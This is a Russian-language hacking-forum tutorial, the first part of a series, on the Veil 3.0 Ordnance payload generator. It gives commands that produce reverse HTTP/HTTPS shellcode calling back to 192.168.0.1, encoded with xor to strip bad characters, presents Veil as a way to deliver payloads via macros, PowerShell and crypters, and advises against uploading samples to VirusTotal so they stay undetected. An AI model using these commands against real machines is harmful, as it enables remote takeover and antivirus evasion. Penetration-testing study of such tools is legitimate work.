• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Veil 3 Odrnance. Часть 1

adm2

Green Team
05.07.2017
50
120
BIT
0
Установка
Часть первая. Veil Ordnance
Часть вторая. Veil Evasion
Взлом удаленного компьютера. Veil-Evasion. Metasploit

Veil Evasion как вы знаете обновился до третьей версии давненько (9 месяцев назад, если быть точнее).
Однако более менее подробного осмотра продукта не нашёл. А если, чего то нет, то разбирайся и создавай сам. Тем более что для начинающих Veil достаточно любопытный инструмент, который задействует в себе сразу несколько компонентов для доставки полезной нагрузки: тут тебе и макросы, и повершелл скрипты, и батники, и крипторы.
Главное на VIRUSTOTAL не грузите ничего, ПАЖАЛУСТА! Если и хотите проверить файл на детект, либо поставьте себе бесплатный какой-нибудь AV (самый простой вариант ), либо воспользуйтесь сервисом , или скомбинируйте и то и то)

Установку достаточно подробно разобрал товарищ @Vander
https://codeby.net/threads/veil-framework.60978/

Окунёмся в функционал:
Veil 3.0 состоит из двух инструментов Ordnance и Evasion, которые можно использовать либо вдумчиво через меню программы, либо быстрыми, как правило, заранее заготовленными командами.

Стандартное меню выглядит следующим образом

Код:
./Veil.py

1.png


Вызываем помощь при использовании инструмента в терминале
Код:
./Veil.py -h
2.png


Veil Ordnance

Ordnance используется для быстрого создания шеллкода, который уже в дальнейшем можно использовать для эксплоитов или полезных нагрузок.

- Получаем список доступных нагрузок для инструмента Ordnance
Код:
./Veil.py -t Ordnance --list-payloads
3.png


- Список достпных енкодеров
Код:
./Veil.py -t Ordnance --list-encoders
4.png


- Используем Ordnance для генерации обратной полезной нагрузки https, которая соединяется с 192.168.0.1 на 4443 порту
Код:
./Veil.py -t Ordnance --ordnance-payload rev_https --ip 192.168.0.1 --port 4443
5.png

- Используем Ordnance для генерации обратной полезной нагрузки http, которая соединяется с 192.168.0.1 на 8080 порту, затем применяется xor енкодер (-e xor) и удаляются плохие символы (-b \\x00\\x0a)
Код:
./Veil.py -t Ordnance --ordnance-payload rev_http --ip 192.168.0.1 --port 8080 -e xor -b \\x00\\x0a
6.png


Чтобы шелкод смог выполнить своё предназначение его необходимо скомпилировать либо с использованием второго инструмента Evasion, либо сторонним софтом.

Ну и гифку закину по использованию через меню самой программы
1.gif


Про Evasion в след. части .
Спасибо за внимание.

Установка
Часть первая. Veil Ordnance
Часть вторая. Veil Evasion
Взлом удаленного компьютера. Veil-Evasion. Metasploit
 
Последнее редактирование:

Dr.Lafa

Green Team
30.12.2016
507
1 049
BIT
0
Всё никак руки не доходили 3-й Veil затестить. ТС молодец, хороший обзор.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!